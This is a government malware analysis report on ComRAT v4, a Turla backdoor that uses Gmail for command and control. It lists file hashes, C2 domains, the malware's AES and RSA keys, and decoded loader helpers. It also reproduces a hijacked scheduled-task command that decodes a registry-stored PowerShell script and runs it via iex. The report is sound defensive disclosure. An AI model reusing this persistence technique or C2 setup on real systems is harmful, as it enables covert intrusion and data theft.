Original release date: October 29, 2020

Notification

This report is provided “as is” for informational purposes only. The Department of Homeland Security (DHS) does not provide any warranties of any kind regarding any information contained herein. The DHS does not endorse any commercial product or service referenced in this bulletin or otherwise.

This document is marked TLP:WHITE–Disclosure is not limited. Sources may use TLP:WHITE when information carries minimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to standard copyright rules, TLP:WHITE information may be distributed without restriction. For more information on the Traffic Light Protocol (TLP), see http://www.us-cert.gov/tlp.

Summary

Description

This Malware Analysis Report (MAR) is the result of analytic efforts between the Cybersecurity and Infrastructure Security Agency (CISA), the Cyber National Mission Force (CNMF), and the Federal Bureau of Investigation (FBI). The malware variant, known as ComRAT, has been used by Turla, a Russian-sponsored Advanced Persistent Threat (APT) actor. CISA, CNMF, and FBI are distributing this MAR to enable network defense and reduced exposure to malicious activity. This MAR includes suggested response actions and recommended mitigation techniques.

FBI has high-confidence that Russian-sponsored APT actor Turla, which is an espionage group active for at least a decade, is using ComRAT malware to exploit victim networks. The group is well known for its custom tools and targeted operations.

This report analyzes a PowerShell script that installs a PowerShell script, which will decode and load a 64-bit dynamic-link library (DLL) identified as ComRAT version 4. This new variant of ComRAT contains embedded 32-bit and 64-bit DLLs used as communication modules. The communication module (32-bit or 64-bit DLL) is injected into the victim systemís default browser. The ComRATv4 file and the communication module communicate with each other using a named pipe. The named pipe is used to send Hypertext Transfer Protocol (HTTP) requests and receive HTTP responses to and from the communication module for backdoor commands. It is designed to use a Gmail web interface to receive commands and exfiltrate data. The ComRAT v4 file contains a Virtual File System (VFS) in File Allocation Table 16 (FAT16) format, which includes the configuration and logs files.

Users or administrators should flag activity associated with the malware and report the activity to the CISA or the FBI Cyber Watch (CyWatch), and give the activity the highest priority for enhanced mitigation. For more information on malicious cyber activity, please visit https://us-cert.cisa.gov/

For a downloadable copy of IOCs, see: MAR-10310246-2.v1.WHITE.stix.

Submitted Files (5)

00352afc7e7863530e4d68be35ae8b60261fc57560167645697b7bfc0ac0e93d (Communication_module_32.dll)

134919151466c9292bdcb7c24c32c841a5183d880072b0ad5e8b3a3a830afef8 (corrected.ps1)

166b1fb3d34b32f1807c710aaa435d181aedbded1e7b4539ffa931c2b2cdd405 (Communication_module_64.dll)

44d6d67b5328a4d73f72d8a0f9d39fe4bb6539609f90f169483936a8b3b88316 (ComRATv4.exe)

a3170c32c09fc85cdda778a5c20a3dab144b6d1dd9996ba8340866e0081c7642 (Decode_PowerShell.ps1)

Domains (6)

branter.tk

bronerg.tk

crusider.tk

duke6.tk

sanitar.ml

wekanda.tk

Findings

134919151466c9292bdcb7c24c32c841a5183d880072b0ad5e8b3a3a830afef8

Tags

dropper

Details

Name
corrected.ps1

Size
4345430 bytes

Type
Little-endian UTF-16 Unicode text, with very long lines, with CRLF, LF line terminators

MD5
65419948186842f8f3ef07cafb71f59a

SHA1
93537b0814177e2101663306aa17332b9303e08a

SHA256
134919151466c9292bdcb7c24c32c841a5183d880072b0ad5e8b3a3a830afef8

SHA512
83d093c6febacb11fcde57fee98c2385f628e5cd3629bfabd0f9e4d2c5de18c6336b3d3aff8081b06a827e742876d19ae370e81890c247daac73d4f8b7ea5f90

ssdeep
24576:+vq2EYNg0gX792UHDoSe9Ov2a8p+JnHZUoWYWUpcfm3WuPhu/aqJOFKs4Wuw054o:Drr9q0v4ubJmg4OFuwkOM5NZihxs

Entropy
4.004402

Antivirus

No matches found.

YARA Rules

No matches found.

ssdeep Matches

No matches found.

Relationships

1349191514…
Contains
a3170c32c09fc85cdda778a5c20a3dab144b6d1dd9996ba8340866e0081c7642

Description

This file is a heavily encoded malicious PowerShell script. It is designed to install a malicious PowerShell script into a registry on the victim system. This malicious script also modifies the following scheduled task on the victim’s system:

—Begin Modified Scheduled Task—
C:WindowsSystem32TasksMicrosoftWindowsCustomer Experience Improvement ProgramConsolidator
—End Modified Scheduled Task—

The modification of this scheduled task causes the installed malicious PowerShell script to be executed. Displayed below is the original scheduled task:

—Begin Original Scheduled Task—
<?xml version=”1.0″ encoding=”UTF-16″?>
<Task xmlns=”http://schemas.microsoft.com/windows/2004/02/mit/task”>
<RegistrationInfo>
   <Version>1.0</Version>
   <SecurityDescriptor>D:(A;OICI;FA;;;BA)(A;OICI;FA;;;SY)(A;OICI;GRGX;;;AU)</SecurityDescriptor>
   <Source>$(@%systemRoot%system32wsqmcons.exe,-106)</Source>
   <Author>$(@%systemRoot%system32wsqmcons.exe,-108)</Author>
   <Description>$(@%systemRoot%system32wsqmcons.exe,-107)</Description>
   <URI>MicrosoftWindowsCustomer Experience Improvement ProgramConsolidator</URI>
</RegistrationInfo>
<Principals>
   <Principal id=”WinSQMAccount”>
    <UserId>S-1-5-18</UserId>
   </Principal>
</Principals>
<Settings>
   <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>
   <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>
   <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>
   <StartWhenAvailable>true</StartWhenAvailable>
   <IdleSettings>
    <StopOnIdleEnd>true</StopOnIdleEnd>
    <RestartOnIdle>false</RestartOnIdle>
   </IdleSettings>
   <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>
</Settings>
<Triggers>
   <TimeTrigger>
    <StartBoundary>2004-01-02T00:00:00</StartBoundary>
    <Repetition>
       <Interval>PT6H</Interval>
    </Repetition>
   </TimeTrigger>
</Triggers>
<Actions Context=”WinSQMAccount”>
   <Exec>
    <Command>%SystemRoot%System32wsqmcons.exe</Command>
   </Exec>
</Actions>
</Task>
—End Original Scheduled Task—

The scheduled task is then modified by this malicious PowerShell script. Displayed below is the modified scheduled task:

—Begin Modified Scheduled Task—
<?xml version=”1.0″ encoding=”UTF-16″?>
<Task version=”1.3″ xmlns=”http://schemas.microsoft.com/windows/2004/02/mit/task”>
<RegistrationInfo>
   <Source>$(@%systemRoot%system32wsqmcons.exe,-106)</Source>
   <Author>$(@%systemRoot%system32wsqmcons.exe,-108)</Author>
   <Version>1.0</Version>
   <Description>$(@%systemRoot%system32wsqmcons.exe,-107)</Description>
   <URI>MicrosoftWindowsCustomer Experience Improvement ProgramConsolidator</URI>
   <SecurityDescriptor>D:(A;OICI;FA;;;BA)(A;OICI;FA;;;SY)(A;OICI;GRGX;;;AU)</SecurityDescriptor>
</RegistrationInfo>
<Triggers>
   <TimeTrigger>
    <Repetition>
       <Interval>PT6H</Interval>
       <StopAtDurationEnd>false</StopAtDurationEnd>
    </Repetition>
    <StartBoundary>2004-01-02T00:00:00</StartBoundary>
    <Enabled>true</Enabled>
   </TimeTrigger>
   <LogonTrigger>
    <Enabled>true</Enabled>
   </LogonTrigger>
</Triggers>
<Principals>
   <Principal id=”WinSQMAccount”>
    <RunLevel>LeastPrivilege</RunLevel>
    <UserId>SYSTEM</UserId>
   </Principal>
</Principals>
<Settings>
   <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>
   <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>
   <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>
   <AllowHardTerminate>true</AllowHardTerminate>
   <StartWhenAvailable>true</StartWhenAvailable>
   <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>
   <IdleSettings>
    <StopOnIdleEnd>true</StopOnIdleEnd>
    <RestartOnIdle>false</RestartOnIdle>
   </IdleSettings>
   <AllowStartOnDemand>true</AllowStartOnDemand>
   <Enabled>true</Enabled>
   <Hidden>false</Hidden>
   <RunOnlyIfIdle>false</RunOnlyIfIdle>
   <DisallowStartOnRemoteAppSession>false</DisallowStartOnRemoteAppSession>
   <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>
   <WakeToRun>false</WakeToRun>
   <ExecutionTimeLimit>PT72H</ExecutionTimeLimit>
   <Priority>7</Priority>
</Settings>
<Actions Context=”WinSQMAccount”>
   <Exec>
    <Command>cmd.exe</Command>
    <Arguments>/c “%SystemRoot%System32wsqmcons.exe &amp; PowerShell.exe -v 2 “$GS459ea = ‘KVYYOBBA4331110uhyicnoor’;
[Text.Encoding]::ASCII.GetString([Convert]::”Fr`omBa`se6`4Str`ing”((gp HKLM:SOFTWAREMicrosoftSQMClientWindows).WSqmCons))|iex;
“”</Arguments>
   </Exec>
</Actions>
</Task>
—End Modified Scheduled Task—

   The modification of the scheduled task illustrated below indicates the primary purpose of this task modification is to decode and execute a PowerShell script contained within the registry key HKLM:SOFTWAREMicrosoftSQMClientWindows = WSqmCons:

—Begin Specific Scheduled Task Module—
<Actions Context=”WinSQMAccount”>
   <Exec>
    <Command>cmd.exe</Command>
    <Arguments>/c “%SystemRoot%System32wsqmcons.exe &amp; PowerShell.exe -v 2 “$GS459ea = ‘KVYYOBBA4331110uhyicnoor’;
[Text.Encoding]::ASCII.GetString([Convert]::”Fr`omBa`se6`4Str`ing”((gp HKLM:SOFTWAREMicrosoftSQMClientWindows).WSqmCons))|iex;
“”</Arguments>
—End Specific Scheduled Task Module—

This malicious script installs a PowerShell script (a3170c32c09fc85cdda778a5c20a3dab144b6d1dd9996ba8340866e0081c7642) into the “WsqmCons” registry key. The primary purpose of the newly installed PowerShell is to decode and load a malicious DLL, identified as ComRat v4 (44d6d67b5328a4d73f72d8a0f9d39fe4bb6539609f90f169483936a8b3b88316) onto the victim’s system.

a3170c32c09fc85cdda778a5c20a3dab144b6d1dd9996ba8340866e0081c7642

Tags

trojan

Details

Name
Decode_PowerShell.ps1

Size
1264496 bytes

Type
ASCII text, with very long lines, with CRLF, LF line terminators

MD5
0fd79f4c60593f6aae69ff22086c3bb0

SHA1
07f0692c856703d75a9946a0fbb3c0db03f7ac40

SHA256
a3170c32c09fc85cdda778a5c20a3dab144b6d1dd9996ba8340866e0081c7642

SHA512
28a0ae0a779aa88499f70cf97ef9db9482527017ea76ee2e469e4184684c4d4fb0559e50f1721e7e9d02655bee4cdf7b12c62a3d037ea10130121cfbb772e250

ssdeep
24576:jarQlVyeHtWdf7PyJjwLKWp57+7fb0TLaB7VrE:jD567vs1tm

Entropy
6.091278

Antivirus

Antiy
GrayWare/PowerShell.Mimikatz.a

ClamAV
Win.Trojan.PSempireInj-7013548-0

Microsoft Security Essentials
Trojan:PowerShell/Powersploit.J

NANOAV
Trojan.Script.ExpKit.eydujq

Symantec
Hacktool.Mimikatz

YARA Rules

No matches found.

ssdeep Matches

No matches found.

Relationships

a3170c32c0…
Contained_Within
134919151466c9292bdcb7c24c32c841a5183d880072b0ad5e8b3a3a830afef8

a3170c32c0…
Dropped
44d6d67b5328a4d73f72d8a0f9d39fe4bb6539609f90f169483936a8b3b88316

Description

This heavily encoded PowerShell script is installed by the malicious script “corrected.ps1” (134919151466c9292bdcb7c24c32c841a5183d880072b0ad5e8b3a3a830afef8). It is designed to decode and load an embedded DLL which has been identified as a variant of the malware known as ComRat v4 “ComRATv4.exe (44d6d67b5328a4d73f72d8a0f9d39fe4bb6539609f90f169483936a8b3b88316).

Removal of some of the PowerShell obfuscation reveals the functions illustrated below. These functions are used to decompress the embedded DLL, before it is loaded on the target system:

—Begin PowerShell Helper Functions—
   using System;
   using System.IO;
   using System.IO.Compression;

   public static class CD475bjf{
       public static void DBQ800fc(Stream input, Stream output){byte[] buffer = new byte[16 * 1024];
       int bytesRead;
       while((bytesRead = input.Read(buffer, 0, buffer.Length)) > 0){
           output.Write(buffer, 0, bytesRead);
       }}}
   
   public static class MAE38aee{
   
       public static byte[] JZ653jdh(byte[] arrayToCompress){
           using (MemoryStream outStream = new MemoryStream()){using (GZipStream tinyStream = new GZipStream(outStream, CompressionMode.Compress))using (MemoryStream mStream = new MemoryStream(arrayToCompress))CD475bjf.DBQ800fc(mStream, tinyStream);
       return outStream.ToArray();
   }}
   
       public static byte[] PGN255ij(byte[] arrayToDecompress){        
           using (MemoryStream inStream = new MemoryStream(arrayToDecompress))using (GZipStream bigStream = new GZipStream(inStream, CompressionMode.Decompress))using (MemoryStream bigStreamOut = new MemoryStream()){CD475bjf.DBQ800fc(bigStream, bigStreamOut);
       return bigStreamOut.ToArray();
   }}}

#decode base64 above
$decompress = [Convert]::FromBase64String($decompressbase64);

#create another text object for use later
$NS70gea = New-Object System.Text.ASCIIEncoding;

#convert base64 decoded value to string
$decompress = $NS70gea.GetString($decompress,0,$decompress.Length);
—End PowerShell Helper Functions—

Figure 1 illustrates a part of the payload embedded within this malicious script. The encoded PowerShell script contains an embedded function named “Run”, that can load a DLL directly from memory and inject it into a remote process (Figure 2). The PowerShell script injects the embedded ComRAT DLL (44d6d67b5328a4d73f72d8a0f9d39fe4bb6539609f90f169483936a8b3b88316) into the Windows Explorer process.

Screenshots

Figure 1 – Screenshot of the payload embedded within this malicious script.

Figure 2 – Screenshot of the function used to load a DLL directly from memory and inject it into a remote process.

44d6d67b5328a4d73f72d8a0f9d39fe4bb6539609f90f169483936a8b3b88316

Tags

trojan

Details

Name
ComRATv4.exe

Size
1827840 bytes

Type
PE32+ executable (DLL) (GUI) x86-64, for MS Windows

MD5
faaafa3e115033ba5115ed6a6ba59ba9

SHA1
ca16a95cd38707bad2dc524bb3086b3c0cb3e372

SHA256
44d6d67b5328a4d73f72d8a0f9d39fe4bb6539609f90f169483936a8b3b88316

SHA512
6f2fe02c1e15be2409f89ff1e6ae3c78f87e242ee448fe5ff6d375a74f10c7c6cc01f3f6d796aa34599a891e03c5d421d10f0c041e5a6dc0e346aea3ae21a935

ssdeep
49152:jTRjrgdOU9p1PZH/JNTFTJT5dwIwzQJH:PRCBNTBwAH

Entropy
6.463931

Antivirus

Ahnlab
Trojan/Win64.Turla

ESET
a variant of Win64/Turla.BX trojan

YARA Rules

No matches found.

ssdeep Matches

No matches found.

PE Metadata

Compile Date
2018-03-06 09:38:38-05:00

Import Hash
d9d661a606c9d1c23b47672d1067de68

PE Sections

MD5
Name
Raw Size
Entropy

11525199e6e248e88e0529cf72a9002d
header
1024
2.934959

0f3258519a92690d14406e141dcb285b
.text
1027584
6.441800

fa4840dc4653443d4574486df39bc6a3
.rdata
481280
4.896843

ca22c78d526550925d7843a24cd1d266
.data
264704
7.368343

f7cc8fa49cfa87a125d8354082e162f3
.pdata
47104
6.030652

ef6fdd7440f36ba21373b4585a5c83e4
.rsrc
512
4.724729

4f16258cf938a4bc7fe0ae92121f442d
.reloc
5632
5.425381

Relationships

44d6d67b53…
Contains
00352afc7e7863530e4d68be35ae8b60261fc57560167645697b7bfc0ac0e93d

44d6d67b53…
Contains
166b1fb3d34b32f1807c710aaa435d181aedbded1e7b4539ffa931c2b2cdd405

44d6d67b53…
Dropped_By
a3170c32c09fc85cdda778a5c20a3dab144b6d1dd9996ba8340866e0081c7642

Description

This application is a 32-bit Windows DLL that has been identified as a module of ComRAT v4. The DLL is loaded into Windows Explorer (Explorer.exe) by a ComRAT PowerShell loader (a3170c32c09fc85cdda778a5c20a3dab144b6d1dd9996ba8340866e0081c7642). When executed, it checks the victim’s system daytime and it performs code execution between 9AM to 5PM Monday through Friday. During execution, it installs the following files into the %TEMP% folder:

–Begin files–
“%TEMP%iecache.bin” ==> an AES-256-XTS encrypted VFS FAT16 format, containing the malware configuration and the logs files. (The encryption key is generated during runtime and stored in the Windows registry).
“%TEMP%FSAPIDebugLogFile.txt
–End files–

The malware injects an embedded communication module (00352afc7e7863530e4d68be35ae8b60261fc57560167645697b7bfc0ac0e93d or (166b1fb3d34b32f1807c710aaa435d181aedbded1e7b4539ffa931c2b2cdd405) into the victim system’s default browser and executes it. This file and the communication module communicate with each other using a named pipe. The malware uses the named pipe to send HTTP requests and receive HTTP responses to and from the communication module for backdoor commands. It is designed to use the Gmail web interface to receive commands and exfiltrate data.

Illustrated below are sample data observed in the decrypted VFS in FAT16 format. Some of these files can be updated in the VFS using backdoor commands.

–Begin sample data in the VFS —
“/etc/pal/” contains a list of C2 domains: “bronerg.tk|crusider.tk|duke6.tk”
“/etc/gal.bin” contains a list of C2 domains: “sanitar.ml|wekanda.tk|branter.tk”
“/etc/pki/aes_key.pki” : Contains the Advanced Encryption Standard (AES) encryption keys for the C2 communications:

–Begin AES key–
4F8112E9E5AB5391C584D567B58E539F0400094A83EA0C2DDC7FA455FCF447B1
–End AES key–

“/etc/pki/public_cert.pki” contains the Rivest–Shamir–Adleman (RSA) encryption key used for the C2 communications:

–Begin RSA key–
BE51E00093CEB0A5FCAE59EB4EEEB3079D1CB17FC195321587CB513003826917B0BC13EB3B9A4209A4FFAF19C07249D360F447A6FAE3936612516A152619B800C4BE12FFF7077D7AF959ABBFD0A1BC06CD3B9D8DBC079307D79B78E4C7F114DE3B530DF40E40C14299D47CD6530A765B1F2717EAA66AD139B3F6728AFFFC5B6AB3E2B36FB062AD167E2B4450A295038A211E0A8E8BFE01FE338ACF883518099663E95B6266AB037224A32853002A47248012567455AC75939FDFC4018D86C2A6D72770887A8FE0678F5E7BC527FB4787D70923FC6909ACF8DC651F93B5E537ABF860B3262723FB2181E9132E381D892A8864BAB38687231B1E47C00BF10BC445010001
–End RSA key–

It uses the public key cryptography with RSA and AES encrypted email attachments for its Gmail C2 channel.
“/etc/mail/subj_dict” contains the the Subject “Re: |RE: |FW: |FWD: | Fw: | Fwd:| FYI: |FYIP |NRN: | NT: | N/T | n/t| NB |NM| n/m |N/M: |*n/m*”

“/etc/php_storage/GET/DEF/server.txt ” and “/etc/php_storage/POST/DEF/server.txt” contains server IP “172.22.150.125”.
–End sample data in the VFS —

Screenshots

Figure 3 – The first bytes of the decrypted VFS in FAT16 format.

Figure 4 – The decrypted VFS hierarchy, containing the malware configuration and the logs files.

00352afc7e7863530e4d68be35ae8b60261fc57560167645697b7bfc0ac0e93d

Tags

backdoordownloaderloadertrojan

Details

Name
Communication_module_32.dll

Size
61440 bytes

Type
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows

MD5
e509c3a40045d2dab9404240f3f201ed

SHA1
86f747cac3b16ed2dab6d9f72a347145ff7a850d

SHA256
00352afc7e7863530e4d68be35ae8b60261fc57560167645697b7bfc0ac0e93d

SHA512
f78827b6fc258f4a63dd17fec2acb7114329a9d7fd426c72838f2e5e5c54c12fce7be7a0eb9c7e7e74b01fe80c42293ef89c3bcbafd230a68f9639e57f62bb6f

ssdeep
1536:zlAjaBOUFoD0C8YQ7aZS7C2kkAxWzg39xa3cdjrH++:zl2uOUG0CBQ7aZS7C3uzg39xEM

Entropy
5.338807

Antivirus

Antiy
Trojan[Backdoor]/Win32.Turla

Avira
TR/Crypt.XPACK.Gen3

ESET
a variant of Win32/Turla.EO trojan

Ikarus
Trojan-Downloader.Win32.Farfli

NANOAV
Trojan.Win32.Turla.hlrzcr

Symantec
Heur.AdvML.B

YARA Rules

No matches found.

ssdeep Matches

No matches found.

PE Metadata

Compile Date
2018-03-06 09:36:54-05:00

Import Hash
87ab41c57e95562a3e81f0609398b278

PE Sections

MD5
Name
Raw Size
Entropy

b9bd1636e8c11ff1ab2368771e89cfac
header
4096
0.612975

077bf2412ba289da7b6261ffec65988d
.text
49152
6.051754

1c95870051ff12b740487ff93d19ef3b
.rdata
4096
0.317233

b86e403ac8c58a013fe4cda6b6715804
.reloc
4096
0.019202

Relationships

00352afc7e…
Contained_Within
44d6d67b5328a4d73f72d8a0f9d39fe4bb6539609f90f169483936a8b3b88316

00352afc7e…
Connected_To
branter.tk

00352afc7e…
Connected_To
wekanda.tk

00352afc7e…
Connected_To
sanitar.ml

00352afc7e…
Connected_To
duke6.tk

00352afc7e…
Connected_To
bronerg.tk

00352afc7e…
Connected_To
crusider.tk

Description

This application is a 32-bit Windows DLL that has been identified as the communication module injected into the victim’s system default browser by “ComRATv4.exe” (44d6d67b5328a4d73f72d8a0f9d39fe4bb6539609f90f169483936a8b3b88316). It is designed to use the HTTP and a Gmail web interface for the C2. It attempts to connect to its C2 using secure connections.

–Begin list of domains–
bronerg.tk
crusider.tk
duke6.tk
sanitar.ml
wekanda.tk
branter.tk
–End list of domains–

Displayed below is sample request header:

–Begin header–
CONNECT bronerg[.]tk:443 HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
Host: bronerg.tk:443
Content-Length: 0
Connection: Keep-Alive
–End header–

bronerg.tk

Tags

command-and-control

Whois

Domain name:
    BRONERG.TK

Organisation:
    Freedom Registry, Inc.
    2225 East Bayshore Road #290
    Palo Alto CA 94303
    United States
    Phone: +1 650-681-4172
    Fax: +1 650-681-4173

Domain Nameservers:
    NS01.FREENOM.COM
    NS02.FREENOM.COM
    NS03.FREENOM.COM
    NS04.FREENOM.COM

Relationships

bronerg.tk
Connected_From
166b1fb3d34b32f1807c710aaa435d181aedbded1e7b4539ffa931c2b2cdd405

bronerg.tk
Connected_From
00352afc7e7863530e4d68be35ae8b60261fc57560167645697b7bfc0ac0e93d

Description

ComRAT v4 C2 domain.

crusider.tk

Tags

command-and-control

Ports

443 TCP

Whois

Domain name:
    CRUSIDER.TK

Organisation:
    Freedom Registry, Inc.
    2225 East Bayshore Road #290
    Palo Alto CA 94303
    United States
    Phone: +1 650-681-4172
    Fax: +1 650-681-4173

Domain Nameservers:
    NS01.FREENOM.COM
    NS02.FREENOM.COM
    NS03.FREENOM.COM
    NS04.FREENOM.COM

Relationships

crusider.tk
Connected_From
166b1fb3d34b32f1807c710aaa435d181aedbded1e7b4539ffa931c2b2cdd405

crusider.tk
Connected_From
00352afc7e7863530e4d68be35ae8b60261fc57560167645697b7bfc0ac0e93d

Description

ComRAT v4 C2 domain.

duke6.tk

Tags

command-and-control

Whois

Domain name:
    DUKE6.TK

Organisation:
    Freedom Registry, Inc.
    2225 East Bayshore Road #290
    Palo Alto CA 94303
    United States
    Phone: +1 650-681-4172
    Fax: +1 650-681-4173

Domain Nameservers:
    NS01.FREENOM.COM
    NS02.FREENOM.COM
    NS03.FREENOM.COM
    NS04.FREENOM.COM

Relationships

duke6.tk
Connected_From
00352afc7e7863530e4d68be35ae8b60261fc57560167645697b7bfc0ac0e93d

duke6.tk
Connected_From
166b1fb3d34b32f1807c710aaa435d181aedbded1e7b4539ffa931c2b2cdd405

Description

ComRAT v4 C2 domain.

sanitar.ml

Tags

command-and-control

Whois

Domain name:
    SANITAR.ML

Organisation:
    Freedom Registry, Inc.
    2225 East Bayshore Road #290
    Palo Alto CA 94303
    United States
    Phone: +1 650-681-4172
    Fax: +1 650-681-4173

Domain Nameservers:
    NS01.FREENOM.COM
    NS02.FREENOM.COM
    NS03.FREENOM.COM
    NS04.FREENOM.COM

Relationships

sanitar.ml
Connected_From
00352afc7e7863530e4d68be35ae8b60261fc57560167645697b7bfc0ac0e93d

sanitar.ml
Connected_From
166b1fb3d34b32f1807c710aaa435d181aedbded1e7b4539ffa931c2b2cdd405

Description

ComRAT v4 C2 domain.

wekanda.tk

Tags

command-and-control

Whois

Domain name:
    WEKANDA.TK

Organisation:
    Freedom Registry, Inc.
    2225 East Bayshore Road #290
    Palo Alto CA 94303
    United States
    Phone: +1 650-681-4172
    Fax: +1 650-681-4173

Domain Nameservers:
    NS01.FREENOM.COM
    NS02.FREENOM.COM
    NS03.FREENOM.COM
    NS04.FREENOM.COM

Relationships

wekanda.tk
Connected_From
00352afc7e7863530e4d68be35ae8b60261fc57560167645697b7bfc0ac0e93d

wekanda.tk
Connected_From
166b1fb3d34b32f1807c710aaa435d181aedbded1e7b4539ffa931c2b2cdd405

Description

ComRAT v4 C2 domain.

branter.tk

Tags

command-and-control

Ports

443 TCP

Whois

No Whois record at the time of analysis.

Relationships

branter.tk
Connected_From
00352afc7e7863530e4d68be35ae8b60261fc57560167645697b7bfc0ac0e93d

branter.tk
Connected_From
166b1fb3d34b32f1807c710aaa435d181aedbded1e7b4539ffa931c2b2cdd405

Description

ComRAT v4 C2 domain.

166b1fb3d34b32f1807c710aaa435d181aedbded1e7b4539ffa931c2b2cdd405

Tags

trojan

Details

Name
Communication_module_64.dll

Size
64000 bytes

Type
PE32+ executable (DLL) (GUI) x86-64, for MS Windows

MD5
54902e33dd6d642bc5530de33b19e43c

SHA1
a06f0e29fca6eb29bf5334fb3b84a872172b0e28

SHA256
166b1fb3d34b32f1807c710aaa435d181aedbded1e7b4539ffa931c2b2cdd405

SHA512
28b8f63af33f4aebd2b5b582750036db718f657640aca649d4b2b95188661da3834398a56184ee08f64ddf1d32198e722be46dbfbc78e49e0d276fe6c5234b94

ssdeep
1536:p2JmzHKhyOjQuCLA/9zYgJS7aWSXEuT2XWZdjoEGbgqPU6Izj6N1o6OtAEBiUm5+:p2JmcjQuCLA/VYgJS7H21yXQdj5G0qMy

Entropy
5.939047

Antivirus

ESET
a variant of Win64/Turla.CN trojan

YARA Rules

No matches found.

ssdeep Matches

No matches found.

PE Metadata

Compile Date
2018-03-06 09:37:48-05:00

Import Hash
87ab41c57e95562a3e81f0609398b278

PE Sections

MD5
Name
Raw Size
Entropy

199ab75383a70bd1148671ca1c689d0e
header
1024
2.031353

46c52ca20a919c2314e32193eac9ec66
.text
60416
5.990363

a97e460909f791b5d0b571099a5b7b56
.rdata
1536
4.519592

c5ba9ad86e832155180da146aef6eabc
.pdata
1024
3.061435

Relationships

166b1fb3d3…
Contained_Within
44d6d67b5328a4d73f72d8a0f9d39fe4bb6539609f90f169483936a8b3b88316

166b1fb3d3…
Connected_To
bronerg.tk

166b1fb3d3…
Connected_To
crusider.tk

166b1fb3d3…
Connected_To
duke6.tk

166b1fb3d3…
Connected_To
sanitar.ml

166b1fb3d3…
Connected_To
wekanda.tk

166b1fb3d3…
Connected_To
branter.tk

Description

This application is a 64-bit Windows DLL that has been identified as the communication module injected into the victim’s system default browser by “ComRATv4.exe” (44d6d67b5328a4d73f72d8a0f9d39fe4bb6539609f90f169483936a8b3b88316). The DLL is similar to the 32-bit communication module (00352afc7e7863530e4d68be35ae8b60261fc57560167645697b7bfc0ac0e93d).

Relationship Summary

1349191514…
Contains
a3170c32c09fc85cdda778a5c20a3dab144b6d1dd9996ba8340866e0081c7642

a3170c32c0…
Contained_Within
134919151466c9292bdcb7c24c32c841a5183d880072b0ad5e8b3a3a830afef8

a3170c32c0…
Dropped
44d6d67b5328a4d73f72d8a0f9d39fe4bb6539609f90f169483936a8b3b88316

44d6d67b53…
Contains
00352afc7e7863530e4d68be35ae8b60261fc57560167645697b7bfc0ac0e93d

44d6d67b53…
Contains
166b1fb3d34b32f1807c710aaa435d181aedbded1e7b4539ffa931c2b2cdd405

44d6d67b53…
Dropped_By
a3170c32c09fc85cdda778a5c20a3dab144b6d1dd9996ba8340866e0081c7642

00352afc7e…
Contained_Within
44d6d67b5328a4d73f72d8a0f9d39fe4bb6539609f90f169483936a8b3b88316

00352afc7e…
Connected_To
branter.tk

00352afc7e…
Connected_To
wekanda.tk

00352afc7e…
Connected_To
sanitar.ml

00352afc7e…
Connected_To
duke6.tk

00352afc7e…
Connected_To
bronerg.tk

00352afc7e…
Connected_To
crusider.tk

bronerg.tk
Connected_From
166b1fb3d34b32f1807c710aaa435d181aedbded1e7b4539ffa931c2b2cdd405

bronerg.tk
Connected_From
00352afc7e7863530e4d68be35ae8b60261fc57560167645697b7bfc0ac0e93d

crusider.tk
Connected_From
166b1fb3d34b32f1807c710aaa435d181aedbded1e7b4539ffa931c2b2cdd405

crusider.tk
Connected_From
00352afc7e7863530e4d68be35ae8b60261fc57560167645697b7bfc0ac0e93d

duke6.tk
Connected_From
00352afc7e7863530e4d68be35ae8b60261fc57560167645697b7bfc0ac0e93d

duke6.tk
Connected_From
166b1fb3d34b32f1807c710aaa435d181aedbded1e7b4539ffa931c2b2cdd405

sanitar.ml
Connected_From
00352afc7e7863530e4d68be35ae8b60261fc57560167645697b7bfc0ac0e93d

sanitar.ml
Connected_From
166b1fb3d34b32f1807c710aaa435d181aedbded1e7b4539ffa931c2b2cdd405

wekanda.tk
Connected_From
00352afc7e7863530e4d68be35ae8b60261fc57560167645697b7bfc0ac0e93d

wekanda.tk
Connected_From
166b1fb3d34b32f1807c710aaa435d181aedbded1e7b4539ffa931c2b2cdd405

branter.tk
Connected_From
00352afc7e7863530e4d68be35ae8b60261fc57560167645697b7bfc0ac0e93d

branter.tk
Connected_From
166b1fb3d34b32f1807c710aaa435d181aedbded1e7b4539ffa931c2b2cdd405

166b1fb3d3…
Contained_Within
44d6d67b5328a4d73f72d8a0f9d39fe4bb6539609f90f169483936a8b3b88316

166b1fb3d3…
Connected_To
bronerg.tk

166b1fb3d3…
Connected_To
crusider.tk

166b1fb3d3…
Connected_To
duke6.tk

166b1fb3d3…
Connected_To
sanitar.ml

166b1fb3d3…
Connected_To
wekanda.tk

166b1fb3d3…
Connected_To
branter.tk

Recommendations

CISA recommends that users and administrators consider using the following best practices to strengthen the security posture of their organization’s systems. Any configuration changes should be reviewed by system owners and administrators prior to implementation to avoid unwanted impacts.

Maintain up-to-date antivirus signatures and engines.
Keep operating system patches up-to-date.
Disable File and Printer sharing services. If these services are required, use strong passwords or Active Directory authentication.
Restrict users’ ability (permissions) to install and run unwanted software applications. Do not add users to the local administrators group unless required.
Enforce a strong password policy and implement regular password changes.
Exercise caution when opening e-mail attachments even if the attachment is expected and the sender appears to be known.
Enable a personal firewall on agency workstations, configured to deny unsolicited connection requests.
Disable unnecessary services on agency workstations and servers.
Scan for and remove suspicious e-mail attachments; ensure the scanned attachment is its “true file type” (i.e., the extension matches the file header).
Monitor users’ web browsing habits; restrict access to sites with unfavorable content.
Exercise caution when using removable media (e.g., USB thumb drives, external drives, CDs, etc.).
Scan all software downloaded from the Internet prior to executing.
